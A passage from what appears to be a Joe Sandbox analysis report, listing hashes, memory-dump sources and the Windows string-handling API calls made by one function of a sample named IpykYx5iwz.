                                                  • Opcode Fuzzy Hash: 309353bbd672333c74c16a5bae7a6361c4845a3c3dc75abb0db9845a650d995f
                                                  • Instruction Fuzzy Hash: E9713271D00228CBDF28CF98C894BADBBB1FB44305F15816ED456BB281C7785A96DF45
                                                  APIs
                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C4F
                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405C67
                                                  • CharNextA.USER32(00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C78
                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C81
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4133949495.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000001.00000002.4133924200.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4133990934.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134017973.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000001.00000002.4134048992.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_400000_IpykYx5iwz.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                  • String ID:
                                                  • API String ID: 190613189-0
                                                  • Opcode ID: 62ddd0860e25498249f603dfcc8213b483479843cbbb52d6d221ef9dbd1560f9
                                                  • Instruction ID: e9647eef7302a9b27fadec00dc75fba78c5d05178a58941879d213f1a9d3a1c7
                                                  • Opcode Fuzzy Hash: 62ddd0860e25498249f603dfcc8213b483479843cbbb52d6d221ef9dbd1560f9
                                                  • Instruction Fuzzy Hash: 5BF0C231105918FFDB029FA4DD409AEBBA8EF05250B2540BAE840F7210D634EE01AB98